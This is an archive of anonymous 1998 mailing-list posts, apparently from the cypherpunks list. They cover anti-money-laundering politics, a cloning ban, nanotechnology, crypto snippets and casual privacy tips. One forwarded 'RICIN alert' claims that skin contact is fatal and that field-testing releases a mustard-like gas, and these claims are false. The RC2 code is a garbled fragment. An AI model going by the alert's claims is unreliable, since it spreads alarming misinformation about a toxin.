@_subject: Surprise - Anonymous Journalist Opposes Laundering [3/4] 
Whitewash	[The Predictable Agenda Revealed]
All these developments suggest that the world's existing ["]defences["]
against ["]dirty["] money are ["]inadequate["]. [And we all know what their
definition of "adequate" would be.] [*]Banking secrecy is a serious problem[*]. As the table shows, bankers in a number of "high-priority"
centres can still be prosecuted [heaven forbid!] if they hand over
confidential information to officials investigating laundering cases.
[So, absent probable cause that a _real_ crime has been committed, "officials" must be allowed to engage in fishing expeditions without
Therefore, we must give these "officials" carte blanche access to:
   1) private (actually public) bank data.
   2) safe deposit boxes (send a spare key to FATF when you rent a box).
   3) private records (unrecoverable encryption made a felony).
   4) physical warrantless searches of "suspected currency smugglers"
Carte Blanche access is the ultimate goal.
All done "confidentially" you understand. I won't tell the victim if you don't. And people would wonder why I don't have a domestic bank account.]
It also shows that several of these centres have yet to extend their
anti-laundering regimes to cover non-bank financial institutions. [the operative word being _yet_.] No wonder some financial poLiceman claim they
are being asked to fight laundrymen with one hand tied behind their backs. [a straightjacket and possibly rope + oak tree would be appropriate ]
As if that were not bad [good] enough, the current approach to tackling the
[non-]problem of onshore and offshore laundering havens is flawed, too. The
FATF has done some useful work, [like what exactly?] but it has not been
tough enough with slowcoaches. It only censured Turkey several years after
it became a member. [Turkey should tell this ATF to go take a flying leap]
And it has yet to take action against Austria, another member, which still
has anonymous savings accounts [which due to their membership in the reconstituted Holy Roman Empire they will eventually sell out or at best
phase out with grandfather clauses] for its citizens [and many non-citizens as well, leave our Sparbuchen alone thank you very much] despite an FATF
[*]edict[*] banning anonymity.
[A most curious use of language: "despite an edict banning anonymity". And just who is it that supposedly granted FATF the authority to issue _edicts_
(as in dictate, force, coerce) or _ban_ a single goddamn thing?! Apparently a collective "hive" of enthroned, unaccountable, power-usurping bureaucrats are justifying their existence by rendering decisions "for" the
little people and sees itself fit to spew forth proclamations unbeknownst to
many under imaginary authority it has granted unto itself. How very regal of
Is said edict (banning anon accounts) an example of the "useful work" this _anonymous_ journalist refers to? The irony is delicious. Does this represent the type of government-by-edict rule that he/she/it finds so agreeable? Perhaps she-he-it spends too much time attending WTO meetings and
schmoozing with those-who-know-better to discuss the latest nuances of
negotiated edict proclamations. You (anonymous, E-Communist writer) need to get out more, buckwheat.
How about putting this edict thingy up for a vote of the Austrian people?
An antiquated idea I realize but it would give you and your associates an
opportunity to further propagandize the great unwashed to the cause of
Total State Control.
OTOH, then these aspiring fiscal tyrants would have to crawl out of their
committee meetings and explain to the rabble why it is so urgent that private banking be abolished (confidentially, of course).
Besides which, owners of anonymous accounts like them just the way they are
and would find another way to keep their property out of your greedy little
paws regardless (even if you did somehow manage to convince 50.0001% of the
vooters to help you fight non-crime. "We" don't have to show you no steeenkin' passport).]
Some anti-laundering campaigners say that criticism of members in evaluation
reports is often watered down for diplomatic reasons [how can an evaluation
be watered down when it starts with zero substance?]. "Every report was put
through so many whitewashes", complains Sue Thornhill, [parasite, ] a consultant on laundering to the British Bankers Association. The FATF's fans
[such as they are outside the GovernMedia sphere of influence] admit that some plea-bargaining goes on, but insist that it does not let countries off lightly. [What is this utter nonsense: Are representatives of "guilty" nations hauled off to some FATF Star Chamber
and forced to perform lewd acts with smart cards?!?]
Whatever the truth, [the truth being that money laundering is not a crime;
acknowledgment of which would run counter to your basic philosophical premise and thus be dismissed as extremist libertarian kookery] there is an
even bigger problem with the task force's approach [the problem is the existence of FATF and other agencies of its ilk]. Every time it persuades a financial centre [against it's best interests] to crack down on laundering, crooks will move to new ones [as would any normal person who
places a value on customer service]. As the amount of money that comes with
them grows, so the incentive for these other havens to change their ways will dimish. [until they become fat and happy like Helvetia, then they begin
to evidence a strange desire to look 'respectable' in front of the 'world community' and now readily strap on the knee-pads for their pimp: the United
States] The FATF seems to be hoping that peer-group pressure is the solution. [Oh yeah? Just because your friends have abolished (de facto) bank
secrecy and have ceased jailing informants and foreign moles does that mean
you're going to do it as well? What would your mother say about that?] It has set up a regional Caribbean task [tax] force and is ["]supporting["] the
creation of an Asia-Pacific anti-laundering group. [picture an enterprising
cretin at FATF calling some string-puller over at the IMF: 'Tell them to give us all the access we want to foreign account holder data or else no more taxpayer coerced bailout for you Asians'...] But even if this attempt to sign up new members works, such an approach will take a long time. And there is a danger that many members will sign up to get the FATF's badge of respectability [and the cushy do-nothing jobs that go along with it for political hacks and career bureaucrats], and then drag their feet over implementing its recommendations. [confusing, are they _edicts_ or _recommendations_ ?]
So are economic sanctions against refuseniks the answer? The sort of
"economic warfare" envisaged by Senator Kerry is not. Banning citizen[-hostage]s of a few rich countries from dealing with known
laundromats would hurt legitimate businesses, while crafty launderers would
find ways round the restrictions. [Senator Kerry, (Looter-Taxachusetts): "Yeah right, that's a wimpy apologetic journalist pretending to present both sides of an issue, let's get real here, no _legitimate_ business would need to have an Aruban
bank account when our local S&L offers backup withholding, full disclosure on request to any and all government employees, demands for SSN's and fingerprints, deposit insurance and CTRs, in short all the protection and benefits the surveillance state has to offer. So those who have the mistaken
notion that all assets DO NOT belong to the state and DO NOT submit to the fact that those assets they are trying to keep from our grasp belong TO US and are only on temporary loan to individual shee, um, people need to be set
straight and made an example of. I say we must pull another Panama and invade these small narco-terrorist haven countries and shut all their banks
down permanently. If citizens of these pathetic excuses for states want a bank account, our good Bwoston banks are more than happy to serve them."]
That leaves Mr Tanzi's proposed strategy as the only current proposal with something to recommend it. Of course, getting an international agreement on
minimum anti-laundering standards will not be an easy task. But it is worth
a try. For without a concerted global response [= global surveillance of every transaction = dictatorial global bureaucracies] to the problem of ["]dirty["] money, the world's money-laundering machine will be off on yet another devastating [to whom?] cycle.
Banking secrecy is a serious problem.
Unreported asset possession is a serious problem.
Non-governmental ComSec is a serious problem.
Non-intelligence-agency laundering is a serious problem.
Anonymous ownership transfers are a serious problem.
Unreported cash transactions are a serious problem.
Cash is a serious problem.
Teenage fucking is a serious problem.
Non-alcohol, non-prescription drug consumption is a serious problem.
Contraband smuggling is a serious problem.
The emerging e-cash threat is a serious problem.
Anonymous accounts are a serious problem.
Bearer shares are a serious problem.
Multiple identities are a serious problem.
Unregistered gun ownership is a serious problem.
Inadequate government staffing is a serious problem.
Inadequate international cooperation is a serious problem.
Inadequate tax revenue is a serious problem.
Freedom is a serious problem.
Unacceptable. These activities will be stopped. You will be assimilated.
These FATF swine need a good ass-kicking.]
Fly Low
Pro:__Money Laundering__Self Medication__Militia Grade Arms__Realism________
__Indirect Taxation___________Adults___________Individual Irrevocable Right$
} 	Smurf N Sniff		Non-Member, Gunfiscators of Canberra	   |
} 	P.O. Bunker 6669	"We don't want to be like those paranoid   |
} 	Hohoe, Ghana		Americans, this is a social DemoBracy."    |
} 	fn-fal at edict.gov.un	+233 55 1234	boycott GovernMedia NLC    |
ANTI:_feral guVermin____Vooters__________blue hellmutts______nihilists______
__biometric herd management__"(The) children"__state granted privilege_____!---------------------------------------------------------------------------

@_date: 1998-01-13 07:08:05
@_author: Anonymous 
@_subject: No Subject 
If man were meant to clone, he'd have twins.
 - Anon

@_date: 1998-01-13 13:17:11
@_author: Anonymous 
@_subject: Talk of Banning Research into Human Cloning 
Actually, not at all.
There is no ban on publishing information on cloning, "just" a ban on the
activity.  Hence the first amendment is not implicated.  If it were the
case the every action (as opposed to speech/publication) were protected by
the 1st Am. then every statute making robbery a crime would be
unconstitutional too.
Similarly, the 4th Am. is not implicated.  The right to be secure against
UNREASONABLE search and seizure is not violated when and if congress
passes a law defining a new crime, or you are arrested for committing it.
again, note that the ban is on CLONING, not THINKING OR WRITING OR READING
about cloning.  It's not the same thing. This is an aside, but the CRA is in no way anomalous given the 13th, 14th
and 15th Amendments.  It is only "anomalous" if one sticks to the
Constitution as written in the 18th century... and ignores the articles
written in that same century that clearly contemplate amendments....
Arguably, many of the legal bans in force today are due to ethics, e.g.:
* bans on suicide
* bans on plural marriage
* bans on certain abortions
* bans on ingestion of some substances
The courts in their infinite wisdom have not found these to be
unconstitutional laws.
Again, this misunderstands somewhat: the ban is on EXPERIMENTS (which are
indeed part of the search for truth), but not writing, reading thinking
Not directly, IMHO.
A. Michael Froomkin         +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law  U. Miami School of Law      froomkin at law.miami.edu
P.O. Box 248087             Coral Gables, FL 33124 USA  It's warm here.

@_date: 1998-01-13 20:04:13
@_author: Anonymous 
@_subject: [ADMINISTRATIVIUM] Firewalls 
Timmy C. Mayonnaise's reheated, refurbished, and regurgitated cud is completely inappropriate for the mailing lists into which it is cross-ruminated.
      ,,,
 -ooO(o o)Ooo- Timmy C. Mayonnaise
      (_)

@_date: 1998-01-14 00:12:02
@_author: Anonymous 
@_subject: Talk of Banning Research into Human Cloning (fwd) 
This is a more significant difference than you let on: if the research is
done abroad, it can be published here.  To the extent that one can
theorize without experimenting, that too can be done here.  Congress has the power to choose whether to ban acts when the cause a harm
(fists that connect to federal noses), or just to ban acts whether or not
they cause harms (sending threats to government officials; broadcasting
without a license on an unused frequency).  Like it or not, there is no
question that most of these bans -- including the cloning ban -- are
constitutional under the commerce and other powers, the copyrights clause
notwithstanding. PS.  I killfiled this guy ages ago on the grounds of rudeness, general
unpleasantness, and especially a complete and utter incomprehension about
how the law in this country operates.  It is as if someone once read some
software company's publicity about how easy it is to operate their
software and concluded they should therefore be able to write programs in
any language.  Since someone forwarded me this post, I'm replying to it, but I doubt I'll
bother doing so in the future.  I entered this thread because Tim May made
some comments; I respect his writing and I think other people probably do
too.  As a result, it seemed important to offer some basic doctrine as a
response.  Note, again, that I'm not expressing a view on the MERITS of
the legislation, just one law professor's view on whether courts would be
likely to uphold it if it passes. A. Michael Froomkin         +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law  U. Miami School of Law      froomkin@ no spam please
P.O. Box 248087             Coral Gables, FL 33124 USA  It's warm here.

@_date: 1998-01-14 11:17:42
@_author: Anonymous 
@_subject: Rincin AP 
Forward from Terrorism list:
Bureau of Narcotic Enforcement
Merced/Mariposa Narcotic Task Force
RE: RICIN Alert
The Sacramento Regional Office of the Bureau of Narcotic Enforcement has offered this alert to all it's personnel:
  "The following alert has been confirmed and is being shared   throughout the law enforcement and intelligence community.
  This alert advises that nationwide trend among drug traffickers is to   "bait" law enforcement officers with a white powder called RICIN.   RICIN is a derivative of Castor beans and looks like powder   methamphetamine. It is highly toxic and if it contacts human skin, it   is fatal. The death process takes several days, depending upon the   dosage, and is almost impossible to detect during an autopsy.
  Forensic experts advise that if you field test RICIN in the Scott   Reagent Kit, it will foam and bubble extensively. The test will also   produce a gas that is very similar to mustard gas and can also be   lethal if inhaled. RICIN is 6,000 times more lethal than cyanide and   there is no antidote. Symptoms of contact exposure to RICIN are:   Fever, cough, weakness, and hypothermia, progressing to dangerously   low blood pressure, heart failure and death.
  Due to this situation, in the event of suspect drug seziures, do not   come into direct skin contact with any powdered substances, and   exhibit caution of field testing any powdered substances."
We are forwarding this advisory to all California EMS Agencies and recommend that each agency contact the local hospitals in their area. We are unaware if RICIN can be detected on a toxicological exam.
There is a potential for someone, other than law enforcement, to become contaminated with this substance.

@_date: 1998-01-14 22:38:45
@_author: Anonymous 
@_subject: Don't shoot the messenger (Re: 1 Question to Dr. Froomkin...) (fwd) 
Hash: SHA1
A 'yellow streak'?  This is oh-so-mature, Jim.  Especially following
your increasingly desperate 'why won't you speak with me, Dr.
Froomkin' pleas.
Face the facts, Jim:  People are kill-filing you because you've been
an arrogant, overbearing prick.  Learn some manners.
  Frondeur

@_date: 1998-01-16 08:46:57
@_author: Anonymous 
@_subject: Microsoft Metaphors 
> What are the best metaphors to use when talking about a browser
 > and an operating system? Is the combination like a car and an
 > engine, or a car and a roofrack? A pair of gloves?
In this specific case it's more like garbage in a trash can.

@_date: 1998-01-16 12:32:54
@_author: Anonymous 
@_subject: Add me to the mailing list 
Do it yourself like an intelligent individual. Cypherpunks write code. If
you can't figure out how to use Majordomo this list probably isn't for you.

@_date: 1998-01-16 16:12:50
@_author: Anonymous 
@_subject: No Subject 
A free/share-ware version of BASIC was released a few years ago,
called UBASIC, which understands big integers.

@_date: 1998-01-17 01:38:36
@_author: Anonymous 
@_subject: Kaczynski attempts suicide 
I don't get it.  The guy is facing the death penalty, and now they're
trying to keep him alive.

@_date: 1998-01-17 02:54:15
@_author: Anonymous 
@_subject: steganography and delayed release of keys (Re: Eternity Services) 
yA, d00d, i g0tz yEr stEg0 dAtA eNcOded r1gh+ h3re... ;-)

@_date: 1998-01-17 05:18:01
@_author: Anonymous 
@_subject: Nanotechnology 
I think people here seriously underestimate how long nanotech will take.
Suppose you have a machine which takes atoms and deposits them onto a
surface, building it up layer by layer.  This is possible with today's
technology, but it's a slow process.
Consider this: If someone builds a replicator which takes a week to make
a copy of itself, every person on this entire planet could have one within
eight months.  Think about it.

@_date: 1998-01-17 07:05:23
@_author: Anonymous 
@_subject: Sun to fight MS w/ new workstations [CNN] 
Hmm...  Considering that you can buy a PC w/ Linux and have a Unix
workstation for less than the cost of a new computer with NT, I wonder
who Sun is really targetting here.
Most of the people buying NT are the same people who bought their last
OS from Microsoft, and don't feel like trying anything new.  Sun's real
problem is that they were charging much more for their computers than
it would cost to put together the parts.  Hence, the drop in demand.
But I suppose 'The evil Microsoft Empire is taking away our customers'
makes for better headlines, even if it is bullshit.

@_date: 1998-01-17 07:47:14
@_author: Anonymous 
@_subject: Eternity Services 
You could challenge the patent, and probably win, for less than $10
million.  There is quite a bit of prior art that Chaum neglected to
disclose, especially a certain incident where Chaum, as editor of
Crypto '84 proceedings, tried to supress part of ElGamal's paper which
discussed 'signature conversion' (aka blind signatures).

@_date: 1998-01-17 16:34:14
@_author: Anonymous 
@_subject: Microsoft Metaphors 
Nah. In this specific case it's more like shit and a toilet. Or if you
wanted to get a bit obscure you could say that Windows is like LSD. It kills
brain cells, attracts the really stupid in addition to the occasional
person with a clue, and the typical user has random flashbacks when put in
front of any computer at all. It has no useful purpose beyond making the
user feel really good, costs a lot, and is dangerous to your (mental)
health. It's produced, handled, and sold by a huge cartel (Microsoft) who
shoots (runs out of business) anybody who opposes them. Those the cartel
doesn't shoot they bribe (buy). And users enter into temporary or in some
cases permanent fits of stupidity and hysteria during which they are a
danger to anyone around them, particularly if they're armed (have a bulk
mailer or platform-specific "web authoring tools" which produce crappy HTML).

@_date: 1998-01-18 04:29:46
@_author: Anonymous 
@_subject: Nanotechnology 
ok, but how do you build a 10-cm cube inside of a 10-cm cube? :)

@_date: 1998-01-18 05:09:26
@_author: Anonymous 
@_subject: Nanotechnology 
You can also push atoms around with an AFM.  It's just slow.  But even if
it did take a week or two to make something, it would still be practical.
You'd probably have to wait a week to get something delivered by
mail-order, so you might as well make it yourself.
I wonder what Tim 'copyright is dead' May will think when anyone can make
a Pentium clone in their back bedroom. :)

@_date: 1998-01-18 12:01:53
@_author: Anonymous 
@_subject: Kaczynski attempts suicide 
It's typical government arrogance. They can kill but nobody else can. And
they demand that when they consider murdering somebody that the target not
murder himself. Stupidity.

@_date: 1998-01-19 05:02:12
@_author: Anonymous 
@_subject: diplomacy 
I find it highly amusing that NSA would design supposedly secure crypto
systems on completely insecure operating systems.  If NSA's computers can
be taken out just by sending a few packet fragments with bad offsets or
macro viruses, that's beyond 'deficiencies' it's utter incompetance...

@_date: 1998-01-19 17:25:45
@_author: Anonymous 
@_subject: proving that one knows how to break RSA 
Oh, please.  Payne's so-called faster factorization algorithm was
discussed on this list May 13.  See the archives under the thread title
"Public Key Break Paper".  The algorithm is total garbage.  Payne is
obviously a nut case who is setting himself up for a contempt of court

@_date: 1998-01-21 01:51:40
@_author: Anonymous 
@_subject: No Subject 
culture, Pakistan's TV censors have been busy.
jeans. Male and female co-hosts of local television programs are no more.
room floor since the launching recently of a campaign by Prime Minister
Nawaz Sharif's government to impose its regimen of Islamic decency on
because it showed a toothy young couple grinning at each other
affectionately. Gone are the soap and shampoo commercials that showed
"female glamour related to their bathing."
traditional Muslim culture.
and Islamic traditions, not at trampling "acceptable" artistic expression,
said Saddiq-ul Farooq, prime minister's spokesman. "The line of
demarcation is that the animal instincts should not be aroused."
toward Islamic fundamentalism that stifles freedom of expression - and
costs them money.
reportedly complained that lascivious Western culture was polluting
state-run Pakistan Television (PTV).
women "giving indecent and vulgar looks which are considered contrary to
Islamic values." It also banned women from appearing in "jeans and
seductive dress."
depict "an alien locale and dresses not in harmony with our national
culture will not be sanctioned for telecast."
and many women don't venture outside the home without a veil, local film
and television is traditionally conservative.
discriminating, slicing footage of nudity, sexual intercourse, gratuitous
violence and foul language from imported films and television programs.
and advised to avoid "unnecessary featuring of females."
that featured a head and shoulder shot of a well-known Pakistani actress
washing her face.
it left to the imagination whether the actress was wearing any clothes,
said Kareem Ramaal, an executive with Asiatic Advertising Ltd., the agency
that produced the commercial.
mean big losses for Pakistan's burgeoning advertising industry.
of the commercials that have been forced off the air.
losses for the cash-strapped state-run channel.
headway in this nation of 140 million people, offering dozens of channels
over which the government has no control.
million people, watch television. Seven percent said they had access to a
satellite dish.
people ... the government should not even attempt to define them," the
independent English-language newspaper The News wrote in an editorial.
worries that Western-influenced pop music and culture could foment
discontent among the country's young.
band, Junoon, banned from television, but rather government unhappiness
over its hits, which speak of Pakistan's social ills and government
listens to us and follows us - especially the social songs."
difference between modernism and Westernization.

@_date: 1998-01-21 02:15:00
@_author: Anonymous 
@_subject: [Long] How to recover private keys for various Microsoft 
On avoiding use of commercial encryption products:
In a session yesterday with a group of Japanese visiting the US to gather information on security products and export controls, a Westerner advised the group to avoid all commercial security products in any country,
domestic or exportables, due to probability of being It was suggested instead to arrange a private service
with a banking institution to covertly ride financial transactions, inland and external.
Better was to arrange the same through military or governmental channels. Fees were claimed to be fairly reasonable depending on whether protection against
national courts and counter-intelligence was needed
at either origin or destination points.
It was emphasized that these practices are now normal
in countries where strongest info security was required for national economic protection against commercial and intelligence espionage, and that no one knowledgeable in the field would rely on commercial products from any The Western briefers were not identifed.

@_date: 1998-01-21 10:08:03
@_author: Anonymous 
@_subject: (eternity) Eternity as a secure filesystem/backup medium 
A practical 128-bit key-cracker could be built with about 10000 cubic
meters of silicon.  (Figure one transistor per cubic micron, 1 ghz
operation, do the math...)  The technology to build a computer of that
size is still a few years away, but it is theoretically possible to build
a 128-bit key-cracker without using quantum computers or travelling to
other planets.

@_date: 1998-01-21 11:14:45
@_author: Anonymous 
@_subject: Land Of The Freeh 
News Of The Weird:
COPYRIGHT:  Neither the name News of the Weird nor any
issue, or portion, of News of the Weird may be used for commercial purpose .  "Any commercial purpose"
includes something as small as a bartered advertisement on a Web
page.  If you have a Web page or a mailing list that you run purely
as a hobby at entirely your own expense, and it is freely accessible
by the public with , you may use portions of
News of the Weird without express permission provided that the
portion(s) is(are) (1) not edited, (2) distinctly separated from
material that is  from News of the Weird, and (3) identified
on the Web site or message as from News of the Weird and with
this copyright notice affixed:  Copyright 1997 by Universal Press

@_date: 1998-01-21 16:20:11
@_author: Anonymous 
@_subject: RC2 C++ source code 
RC2 VC++ source code
  void RC2Keyschedule::schedule
( unsigned short K[64], const unsigned char L[128], unsigned T8, unsigned TM )
                L[i] = PITABLE[L[i-1] + L[i-T]];
        T8 = (T1+7) >> 3;
        TM = 255 MOD 2^(8 + T1 - 8*T8);
        L[128-T8] = PITABLE[L[128-T8] & TM];
                L[i] = PITABLE[L[i+1] XOR L[i+T8]];
        K[i] = L[2*i] + 256*L[2*i+1];
void RC2Encryption::ProcessBlock
( const unsigned short K[64], )
void RC2Decryption::ProcessBlock
( const unsigned short K[64], )

@_date: 1998-01-22 05:24:36
@_author: Anonymous 
@_subject: Deriving economic profits from writing FREE software? 
There's the Intel model - give away software to sell new hardware.
There's the Linus Torvalds model - people pay you to speak at conferences.
There's the w3c model - pay money if you want it now, or wait and get it for
        free next month.
There's the book model - give away the software and sell the documentation.
There's the PGP model - give it away until it becomes popular, then sell it.
...and then there's the Microsoft model - give away 'free' software and
   charge for the OS to run it...

@_date: 1998-01-22 05:27:56
@_author: Anonymous 
@_subject: Swinestein for Senate! 
ACRAMENTO, Calif. (AP) - Sen. Dianne Feinstein ruled out a race for the
Democratic nomination for governor Tuesday, saying she didn't want to
enter "a very debilitating campaign environment."
Clinton personally urged her to enter the race. That call followed pleas
by Democratic members of Congress and the state Legislature to run.
a telephone conference. "It was like a huge weight that came off my
... that I have put more thought and energy into. There also has been none
that has caused me more angst," Feinstein said.
the president ... I thought if any call were to push me over the brink, it
would be a call from the president of the United States."
ambivalence," she said.
nomination for months, said she could serve the people of California
better in the U.S. Senate.
Gov. Pete Wilson, a Republican, can't run again this year because of term
limits. The leading Republican candidate is Attorney General Dan Lungren.
businessman Al Checchi and state Senator John Vasconcellos.
She was elected to the remaining two years of Wilson's Senate term in
1992, defeating his appointed successor, and ran again in 1994 to win a
full six-year term.

@_date: 1998-01-22 11:31:50
@_author: Anonymous 
@_subject: RC1 and RC3 ?? 
Cool! Let's tell him, then, so we won't have to listen to him anymore! :)

@_date: 1998-01-23 02:23:35
@_author: Anonymous 
@_subject: Misty??? 
Adam, you should know better than to ask.  Everyone knows you can't
trust a bigot to do cryptography.  Tim "Chop Chop" May's opinions about
Misty are based not on the strength of the cipher, but on the ethnicity
of the creator.

@_date: 1998-01-23 12:31:14
@_author: Anonymous 
@_subject: State of the Union Address 
My bet is that it'll be the same as it always is. Klintonkov will rant about
how he wants to censor the Internet. Then he'll go on and on about how he
wants to connect every public school to the Internet and tax me to give
these kids censored feeds, all when the students are coming out of the
school system as complete morons. Some can't read, many can't do math, most
have absolutely no clue about basic science, and most have absolutely no
idea about the Bill of Rights and freedom of speech[1].
And of course he'll have to throw in a long diatribe about how Americans
need to surrender more of their freedom to the government. Maybe he'll even
mention how he doesn't remember screwing a reasonably attractive woman half
his age in the White House while she was a White House intern.
[1] Grab a totally random sample of 100 high school students. Haul the
    students out one at a time and ask them the following questions:
1) What is the acceleration of gravity at sealevel on Earth?
2) What are airlocks? What are they used for? How do they work?
3) How many chromosomes are in a normal, healthy human?
4) Joe is one of your classmates. He elects not to say the "Pledge of
   Allegience." Which of the following is true?
    a) He must say it because it is mandated by the government.
    b) He may not say it, but he must stand.
    c) He is not required to acknowledge it, except to allow others to say
       it if they wish to.
    d) He should be taken out behind the school and beaten with a
       sledgehammer. Afterwards his brains should be used to spell the words
       "Death to traitors!"
    e) He should be sent to the principal's office for disciplinary action.
    f) He should be expelled from the country.
    g) He must do so as long as he is a U.S. citizen.
5) Explain the equation 'f=m*a' and Newton's Third Law. 'f=m*a' is referenced
   in the context of Newtonian motion.
6) The First Amendment of the United States Constitution orders which of the
   following?
    a) Congress shall not restrict freedom of speech, the press, assembly,
       or religion.
    b) Congress shall not restrict freedom of speech, the press, assembly,
       or religion, except as ordered by the majority.
    c) Congress and private individuals may not descriminate on the basis of
       sex.
    d) Congress and private individuals may not restrict freedom of speech,
       the press, assembly, or religion.
7) What are the following government agencies and what are their function?
    a) FCC
    b) NSA
    c) CIA
    d) FBI
    e) DEA
    f) BATF
    g) NTSB
    h) DOJ
8) Your city passes a "teen curfew" law ordering criminal penalties for
   anybody younger than 18 who is out after 10PM on school nights. The law
   was passed by popular vote at this year's elections. Which of the
   following is true?
   a) This is a just and fair law, and is completely constitutional.
      Teenagers have no reason to be out past 10PM on school nights. They
      should be at home and asleep.
   b) This law violates the thirteenth amendment.    c) This law violates the first amendment. It violates freedom of assembly.    d) This is a constitutional law. Freedom of assembly does not apply
      because the people voted on this law and it passed by majority vote.
9) How many senators does each state have?
10) "What a piece of work is man; how noble in reason; how infinite in
    faculty, in form, in moving; how express and admirable in action..."
    Name the author.
11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
    circumstances, what is produced and in what quantities?
12) (sin(9)^2 + cos(9)^2)=x. If this quantity can be determined, what is x
    equal to?
13) What is the square root of 256?
14) What is the fourth root of 81?
15) Given complete control of the environment, how could one cause pure     water to boil at 96 degrees C?
16) Explain possible problems with cloning of humans.
Keep in mind that I'm talking about high school graduates or people who have
almost graduated high school here, and these are people who have taken the
appropriate courses. Back in high school I made the mistake of making some comments and assuming
in class discussions that people had basic knowledge. I was wrong. Okay, so
I was naive. Eventually I gave up and stopped participating simply because I
was sick and tired of doing the school's job for them.
1) Most students probably won't have any idea. The value, of course, is
about 9.81 m/s^2. 10 m/s^2 doesn't work although that's given in the
mathematics books they give these kids. Most of them probably won't even
know what the question is asking.
2) I actually brought this topic up to a group of *honors* students. Think
of the expression "shove you out an airlock" for context. They boggled,
wallowed in their ignorance and were proud, and then went off to their think
tank. After confering with each other they came back with the breathtakingly
brilliant answer that it was a contraceptive device. Of course even after
explaining to them what it was they still didn't get the reference, had no
grasp of how such a thing might work, and had no idea what it might be
useful for.
3) This is taught in elementary biology which, at least down here, is a
required course. They had no idea. Actually, most of them had no clue about
basic genetics at all. Yes, basic genetics was covered in the course, and
this material was included.
4) I was "Joe" in this case. The people involved had already taken a
semester government course. Their answer to the question would have been
along the lines of option 'd'.
5) I made a big mistake assuming they knew this one. Oops. 6) Most seemed to believe 'b' or 'd'. Maybe they knew it was 'a' and thought
that maybe people wouldn't notice.
7) I made the mistake of using designations like this in a political science
class during a class discussion. I regretted it when I had to start
explaining these agencies and what they were supposed to be responsible for.
8) No explanation required.
9) "You expect me to memorize that for all 50 states?" "Nevermind."
10) Shakespeare. It wouldn't be so bad if they hadn't had to read Hamlet,
MacBeth, and others in their English classes. Yipes.
11) "How am I supposed to know?" "Uh, you got out of chemistry with a B."
"Yes, but they never gave me problems like that!" Uhhh...
12) Most probably couldn't solve it without a calculator.
13) Ditto.
14) Ditto.
15) They'll probably look at you like you're nuts and explain that you
can't. Uh, right.
16) In an international relations class I took students picked a side and
tried to argue it. Mine was pro-cloning or, more accurately, pro-science. Most were anti-cloning. Why?
    a) "God doesn't like us to do things like that." Right. Let's go outlaw
       fields of research based on one religion and what followers of one
       religion think their god is thinking at that moment. This is        America, not Iraq.
    b) "How would you like it if somebody just came up and cloned you
       without you knowing and then made that person tell them information
       you refused to give them yourself?" Okay, I can buy the unwillful
       cloning part of it and could support a law on the grounds that it's
       theft of genetic material or for a variety of other reasons. As        for the rest of that...ugh.
Now maybe people on this list can't answer some of these either. That isn't
the point. The point is that you should have been taught this stuff in
school. Klintonkov wants to go blow millions (billions?) of dollars for
censored network feeds in the schools and they haven't even got basic
education down? And don't say "computer literacy" either. Most high school
graduates can barely type on the bloody things, and they can forget about
actually fixing a problem themselves. The *teachers* are blatently clueless.
When Klintonkov fixes these problems he can talk about "wiring our schools
for the 21st century." Of course then he'll want to censor the feeds or the
net at large, at which point we're back to square one and should spend the
money on something useful, like paying off the multi-trillion dollar debt the idiots ran up.
Here's the scariest part of it all: These people are voting! And we wonder
why we're in such a mess.
The war isn't the war between the blacks and the whites, the liberals and the conservatives, or the Federation and the Romulans. It's between the clueful and the clueless.

@_date: 1998-01-24 12:25:27
@_author: Anonymous 
@_subject: Why no "Banner Ad Eaters"? 
Tim, I'm surprised. WebFree for the Macintosh does this very thing. It
matches on URL substrings and simply removes these things wholesale from
your browser window. No broken image boxes, nothing. It also kills cookies
and stops animated GIFs from leaking through, if you want to nuke either of
those things.
The URL is: Junkbusters ( offers a personal proxy server
kind of thing that lets you mash just about everything: HTTP headers, user
agent info, referer URL, cookies, etc. It runs on either NT or Unix variants.
One could also use it to get around a firewall configured to reject non-standard browsers, but That Would Be Wrong, as Nixon once said. It lets
you specify which sites or substrings to look for, and which ones you trust.
It also does proxy chaining.
ratbert at nym dot alias dot net

@_date: 1998-01-24 17:19:53
@_author: Anonymous 
@_subject: No Subject 
I've been too amused by the proceedings to comment on it.
The more important silence is about the instant sentencing of the
Unabomber compared to Jim Bell's sentencing.  What _is_ happening with
I saw that.  There are rumors floating about that they have the goods
on Gore too, his hands are certainly as dirty as Slick Willie's.  I'd
like to see both of those rat bastards disgraced.  After all the
vitriol Klinton & Algore have thrown at the '80s and Republicans
their Karma demands they be succeeded by Newt Gengrich (and live to
see it).
Or several years, or whatever ... :-)  I definitely agree.

@_date: 1998-01-25 02:50:57
@_author: Anonymous 
@_subject: State of the Union Address 
They censor TV and tax your telephone
They read your private e-mail and censor crypto publications
They run drugs in South America
They wiretap your telephone They shoot at the drug runners
They burn down churches
They blow up airplanes and blame it on 'terrorists'
They harass Microsoft

@_date: 1998-01-25 04:09:18
@_author: Anonymous 
@_subject: NoneRe: How to eliminate liability? 
This seems like another variation of the 'reverse secret-sharing' schemes,
independently proposed by Jim McCoy, Matt Ghio, and others.
Cooper and Birman give a good theoretical introduction at
although their scheme uses only the simple XOR instead of a full matrix.
Ghio's version is at
Neither paper goes heavily into linear algebra, but the scheme can easily
be extended to martices in a finite field, xor being the special case of
mod 2.
The idea's been around for awhile; it'd be nice to see a working
implementation (hint, hint).

@_date: 1998-01-25 04:44:08
@_author: Anonymous 
@_subject: Document destruction services (fwd) 
I'd use NaOH instead - after you're done, just leave it sit out, and it
will neutralize itself by absorbing carbon dioxide from the atmosphere,
dissolving the ink into little crystal structures which look kinda pretty...

@_date: 1998-01-26 04:08:48
@_author: Anonymous 
@_subject: NYTimes web cookies 
I put this wafer in my junkbuster-configfile and disabled all other cookies,
and NYTimes let me in without asking for a password, but after I read a few
articles, the site started behaving strangely, where the server would seem
to hang on certain pages, taking forever to send the html.
Interesting though.  Maybe we should hold a cypherpunks 'potluck' where
everyone trades cookies.  :)

@_date: 1998-01-26 11:04:54
@_author: Anonymous 
@_subject: Burning papers 
I've heard that you can look at it under a microscope with a polarizing
filter and see the magnetic patterns.  But it's much easier to just encrypt
the disk so you don't waste the media when you're finished.
Plastic should burn fine, as most is polyethylene (CH2) which produces
water and carbon dioxide when burned, leaving virtually no residue.  The
only plastic that you'd need to worry about is chlorinated stuff like PVC.

@_date: 1998-01-26 11:33:54
